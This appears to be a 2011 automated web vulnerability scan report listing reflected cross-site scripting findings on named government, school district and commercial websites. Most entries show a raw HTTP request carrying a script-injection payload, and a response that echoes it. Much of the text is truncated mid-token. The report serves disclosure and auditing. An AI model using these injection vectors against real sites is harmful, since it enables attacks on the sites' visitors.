| HTTP/1.1 404 Not Found connection: close content-language: en content-type: text/html; charset=ISO-8859-1 date: Sat, 30 Apr 2011 12:24:49 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 3711 $wsep: cache-control: no-cache="set-cookie, set-cookie2" expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: AMWEBJCT!%2Fonestop-main <!-- Michigan Business One Stop Portal: 902 --> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <ht ...[SNIP]... <!-- Application Excepiton: java.io.FileNotFound ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://pixel.fetchback |
| Path: | /serve/fb/pdc |
| GET /serve/fb/pdc?cat=&name Host: pixel.fetchback.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 200 OK Date: Fri, 29 Apr 2011 21:19:06 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: cmp=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/ Set-Cookie: uid=1_1304111946 Set-Cookie: kwd=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/ Set-Cookie: sit=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/ Set-Cookie: cre=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/ Set-Cookie: bpd=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/ Set-Cookie: apd=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/ Set-Cookie: scg=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/ Set-Cookie: ppd=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/ Set-Cookie: afl=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Fri, 29 Apr 2011 21:19:06 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 <!-- campaign : 'landing6e92b<x style=x:expression(alert |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://serverapi |
| Path: | /jsapi/arcgis/ |
| GET /jsapi/arcgis/?v=2.1%009332b<script>alert(1)< Host: serverapi.arcgisonline Proxy-Connection: keep-alive Referer: http://data.ok.gov/Public User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Cache-Control: public, max-age=31536000,public Content-Type: text/javascript; charset=UTF-8 Date: Sat, 30 Apr 2011 11:23:08 GMT Expires: Sun, 29 Apr 2012 11:23:08 GMT Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Connection: keep-alive Content-Length: 105 '2.1.9332b<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://sussex.de |
| Path: | /education/school/school |
| GET /educationc4954<script>alert(1)< Host: sussex.de.schoolwebpages Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:28:45 GMT Server: Apache/2.2.14 (Ubuntu) Set-Cookie: PHPSESSID=5934cf28e0 Expires: Wed, 26 Feb 1997 08:21:57 GMT Cache-Control: no-cache, no-store Pragma: no-cache Vary: Accept-Encoding Content-Length: 2813 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org dir="ltr"> ...[SNIP]... <div style="font-style: italic; font-size: 90%;">educationc4954<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://sussex.de |
| Path: | /education/school/school |
| GET /education/school374c9<script>alert(1)< Host: sussex.de.schoolwebpages Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:28:47 GMT Server: Apache/2.2.14 (Ubuntu) Set-Cookie: PHPSESSID=47e8bdcffb Expires: Wed, 26 Feb 1997 08:21:57 GMT Cache-Control: no-cache, no-store Pragma: no-cache Vary: Accept-Encoding Content-Length: 2813 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org dir="ltr"> ...[SNIP]... <div style="font-style: italic; font-size: 90%;">education/school374c9<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://sussex.de |
| Path: | /education/school/school |
| GET /education/school/school Host: sussex.de.schoolwebpages Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:28:50 GMT Server: Apache/2.2.14 (Ubuntu) Set-Cookie: PHPSESSID=043a059757 Expires: Wed, 26 Feb 1997 08:21:57 GMT Cache-Control: no-cache, no-store Pragma: no-cache Vary: Accept-Encoding Content-Length: 2813 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org dir="ltr"> ...[SNIP]... <div style="font-style: italic; font-size: 90%;">education/school ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://sussex.de |
| Path: | /favicon.ico |
| GET /favicon.ico38e16<script>alert(1)< Host: sussex.de.schoolwebpages Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4ab115b4e5 |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 15:10:36 GMT Server: Apache/2.2.14 (Ubuntu) Expires: Wed, 26 Feb 1997 08:21:57 GMT Cache-Control: no-cache, no-store Pragma: no-cache Vary: Accept-encoding Connection: close Content-Type: text/html Content-Length: 2797 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org dir="ltr"> ...[SNIP]... <div style="font-style: italic; font-size: 90%;">favicon.ico38e16<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://tomcat2.dot.state |
| Path: | /ContractsAdministration |
| GET /ContractsAdministrationd702d<script>alert(1)< Host: tomcat2.dot.state.ga.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:28:50 GMT Content-Type: text/html; charset=UTF-8 Server: JRun Web Server <head><title>JRun Servlet Error</title></head><h1 File not found: /ContractsAdministra ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://tomcat2.dot.state |
| Path: | /ContractsAdministration |
| GET /ContractsAdministration Host: tomcat2.dot.state.ga.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:28:52 GMT Content-Language: en Server: JRun Web Server <head><title>JRun Servlet Error</title></head><h1 /ContractsAdministration ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://tomcat2.dot.state |
| Path: | /ContractsAdministration |
| GET /ContractsAdministration8ec08<script>alert(1)< Host: tomcat2.dot.state.ga.us Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:40:16 GMT Content-Language: en Server: JRun Web Server <head><title>JRun Servlet Error</title></head><h1 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://tomcat2.dot.state |
| Path: | /ContractsAdministration |
| GET /ContractsAdministration/d29f2<script>alert(1)< Host: tomcat2.dot.state.ga.us Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:40:17 GMT Content-Language: en Server: JRun Web Server <head><title>JRun Servlet Error</title></head><h1 /ContractsAdmi ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://tomcat2.dot.state |
| Path: | /ContractsAdministration |
| GET /ContractsAdministration Host: tomcat2.dot.state.ga.us Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:40:17 GMT Content-Language: en Server: JRun Web Server <head><title>JRun Servlet Error</title></head><h1 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://tomcat2.dot.state |
| Path: | /ContractsAdministration |
| GET /ContractsAdministration Host: tomcat2.dot.state.ga.us Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:40:18 GMT Content-Language: en Server: JRun Web Server <head><title>JRun Servlet Error</title></head><h1 ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://tomcat2.dot.state |
| Path: | /ContractsAdministration |
| GET /ContractsAdministration Host: tomcat2.dot.state.ga.us Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:40:19 GMT Content-Language: en Server: JRun Web Server <head><title>JRun Servlet Error</title></head><h1 /ContractsAdministrat ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://tomcat2.dot.state |
| Path: | /ContractsAdministration |
| GET /ContractsAdministration Host: tomcat2.dot.state.ga.us Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:40:19 GMT Content-Language: en Server: JRun Web Server <head><title>JRun Servlet Error</title></head><h1 /ContractsAdministration ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://tomcat2.dot.state |
| Path: | /ContractsAdministration |
| GET /ContractsAdministration Host: tomcat2.dot.state.ga.us Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:40:20 GMT Content-Language: en Server: JRun Web Server <head><title>JRun Servlet Error</title></head><h1 /ContractsAdministration ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://tomcat2.dot.state |
| Path: | /ContractsAdministration |
| GET /ContractsAdministration Host: tomcat2.dot.state.ga.us Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:40:22 GMT Content-Language: en Server: JRun Web Server <head><title>JRun Servlet Error</title></head><h1 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://tomcat2.dot.state |
| Path: | /favicon.ico |
| GET /favicon.ico837c1<script>alert(1)< Host: tomcat2.dot.state.ga.us Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:39:46 GMT Content-Language: en Server: JRun Web Server <head><title>JRun Servlet Error</title></head><h1 /favicon.ico837c1<script |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://widgets.digg.com |
| Path: | /buttons/count |
| GET /buttons/count?url=http Host: widgets.digg.com Proxy-Connection: keep-alive Referer: http://xss.cx/2011/04/30 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Age: 0 Date: Sat, 30 Apr 2011 22:24:53 GMT Via: NS-CACHE: 100 Etag: "0c33a6b654e6d62cf28 Content-Length: 181 Server: TornadoServer/0.1 Content-Type: application/json Accept-Ranges: bytes Cache-Control: private, max-age=599 Expires: Sat, 30 Apr 2011 22:34:52 GMT X-CDN: Cotendo Connection: Keep-Alive __DBW.collectDiggs({"url" |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.addthis.com |
| Path: | /bookmark.php |
| GET /bookmark.php9002f<script>alert(1)< Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:29:31 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=4g5qhij8k2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1378 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php9002f<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.addthis.com |
| Path: | /bookmark.php |
| GET /bookmark.php3976f"-alert(1)- Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:29:31 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=b1ej4hl7uc Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php3976f"-alert(1)- if (window._gat) { var gaPageTracker = _gat._getTracker("UA gaPageTracker._setDo gaPageTracker._setCu gaPageTrac ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.addthis.com |
| Path: | /bookmark.php |
| GET /bookmark.php/6936b"-alert(1)- Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:29:27 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96059 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>AddThis Social Bookmarking Sharing Button Widget</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/6936b"-alert(1)- if (window._gat) { var gaPageTracker = _gat._getTracker("UA gaPageTracker._setDo gaPageTracker._track } </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.capehenlo |
| Path: | /education/district |
| GET /educationd8371<script>alert(1)< Host: www.capehenlopenschools Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:30:02 GMT Server: Apache/2.2.14 (Ubuntu) Set-Cookie: PHPSESSID=00bd9d2100 Expires: Wed, 26 Feb 1997 08:21:57 GMT Cache-Control: no-cache, no-store Pragma: no-cache Vary: Accept-Encoding Content-Length: 2817 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org dir="ltr"> ...[SNIP]... <div style="font-style: italic; font-size: 90%;">educationd8371<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.capehenlo |
| Path: | /education/district |
| GET /education/district4a413<script>alert(1)< Host: www.capehenlopenschools Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:30:04 GMT Server: Apache/2.2.14 (Ubuntu) Set-Cookie: PHPSESSID=86b34f1345 Expires: Wed, 26 Feb 1997 08:21:57 GMT Cache-Control: no-cache, no-store Pragma: no-cache Vary: Accept-Encoding Content-Length: 2817 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org dir="ltr"> ...[SNIP]... <div style="font-style: italic; font-size: 90%;">education/district4a413<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.capehenlo |
| Path: | /education/district |
| GET /education/district Host: www.capehenlopenschools Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:30:05 GMT Server: Apache/2.2.14 (Ubuntu) Set-Cookie: PHPSESSID=06c7d39a42 Expires: Wed, 26 Feb 1997 08:21:57 GMT Cache-Control: no-cache, no-store Pragma: no-cache Vary: Accept-Encoding Content-Length: 2816 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org dir="ltr"> ...[SNIP]... <div style="font-style: italic; font-size: 90%;">education/district ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.ct.gov |
| Path: | /ctportal/cwp/view.asp |
| GET /ctportal/cwp/view.asp?a Host: www.ct.gov Proxy-Connection: keep-alive Referer: http://www.ct.gov/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=64328189 |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 22:50:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 30513 Content-Type: text/html Set-Cookie: ctportalNav%5FGID=; path=/ctportal Set-Cookie: ctportalNav=; path=/ctportal Set-Cookie: ctportal=LoginJumpBackTo= Cache-control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML LANG="en-us"> <DSFHEADER> <!--stopindex--> <HEAD> <!-- This site was built with PPT DSF Technology Dynamic S ...[SNIP]... <a href="/ctportal/cwp/view ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://www.ct.gov |
| Path: | /ctportal/cwp/view.asp |
| GET /ctportal/cwp/view.asp?a Host: www.ct.gov Proxy-Connection: keep-alive Referer: http://www.ct.gov/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=64328189 |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 22:50:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 30330 Content-Type: text/html Set-Cookie: ctportalNav%5FGID=; path=/ctportal Set-Cookie: ctportalNav=; path=/ctportal Set-Cookie: ctportal=LoginJumpBackTo= Cache-control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML LANG="en-us"> <DSFHEADER> <!--stopindex--> <HEAD> <!-- This site was built with PPT DSF Technology Dynamic S ...[SNIP]... <A title='This will display page with only the content which is best suited for printing.' HREF='/ctportal/cwp/view ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.ct.gov |
| Path: | /ctportal/site/default |
| GET /ctportal/site/default Host: www.ct.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ctportalNav%5FGID=; ctportalNav=; __utmz=64328189 |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 12:31:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 30625 Content-Type: text/html Set-Cookie: ctportal=SA=False&EA=&SSL Set-Cookie: ctportalNav=; path=/ctportal Set-Cookie: ctportalNav%5FGID=; path=/ctportal Cache-control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML LANG="en-us"> <DSFHEADER> <!--stopindex--> <HEAD> <!-- This site was built with PPT DSF Technology Dynamic S ...[SNIP]... <a href="/ctportal/site ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.ct.gov |
| Path: | /ctportal/taxonomy |
| GET /ctportal/taxonomy Host: www.ct.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ctportalNav%5FGID=; ctportalNav=; __utmz=64328189 |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 12:31:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 28086 Content-Type: text/html Set-Cookie: ctportalPNavCtr%5FGID=; path=/ctportal Set-Cookie: ctportalPNavCtr=; path=/ctportal Set-Cookie: ctportal=SA=False&EA=&SSL Set-Cookie: ctportalNav=; path=/ctportal Set-Cookie: ctportalNav%5FGID=; path=/ctportal Cache-control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML LANG="en-us"> <DSFHEADER> <!--stopindex--> <HEAD> <!-- This site was built with PPT DSF Technology Dynamic S ...[SNIP]... <a href="/ctportal/taxonomy ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.delmar.k12.de |
| Path: | /education/district |
| GET /education769e9<script>alert(1)< Host: www.delmar.k12.de.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:31:51 GMT Server: Apache/2.2.14 (Ubuntu) Set-Cookie: PHPSESSID=c840edd82e Expires: Wed, 26 Feb 1997 08:21:57 GMT Cache-Control: no-cache, no-store Pragma: no-cache Vary: Accept-Encoding Content-Length: 2817 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org dir="ltr"> ...[SNIP]... <div style="font-style: italic; font-size: 90%;">education769e9<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.delmar.k12.de |
| Path: | /education/district |
| GET /education/district3626e<script>alert(1)< Host: www.delmar.k12.de.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:31:53 GMT Server: Apache/2.2.14 (Ubuntu) Set-Cookie: PHPSESSID=885b169a70 Expires: Wed, 26 Feb 1997 08:21:57 GMT Cache-Control: no-cache, no-store Pragma: no-cache Vary: Accept-Encoding Content-Length: 2817 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org dir="ltr"> ...[SNIP]... <div style="font-style: italic; font-size: 90%;">education/district3626e<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.delmar.k12.de |
| Path: | /education/district |
| GET /education/district Host: www.delmar.k12.de.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 404 Not Found Date: Sat, 30 Apr 2011 12:31:55 GMT Server: Apache/2.2.14 (Ubuntu) Set-Cookie: PHPSESSID=2c5421dba8 Expires: Wed, 26 Feb 1997 08:21:57 GMT Cache-Control: no-cache, no-store Pragma: no-cache Vary: Accept-Encoding Content-Length: 2817 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org dir="ltr"> ...[SNIP]... <div style="font-style: italic; font-size: 90%;">education/district ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.delmar.k12.de |
| Path: | /favicon.ico |
| GET /favicon.ico7a4d7<script>alert(1)< Host: www.delmar.k12.de.us Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=e7842bb204 |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 15:09:51 GMT Server: Apache/2.2.14 (Ubuntu) Expires: Wed, 26 Feb 1997 08:21:57 GMT Cache-Control: no-cache, no-store Pragma: no-cache Vary: Accept-encoding Connection: close Content-Type: text/html Content-Length: 2797 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org dir="ltr"> ...[SNIP]... <div style="font-style: italic; font-size: 90%;">favicon.ico7a4d7<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.georgia.gov |
| Path: | /external/ |
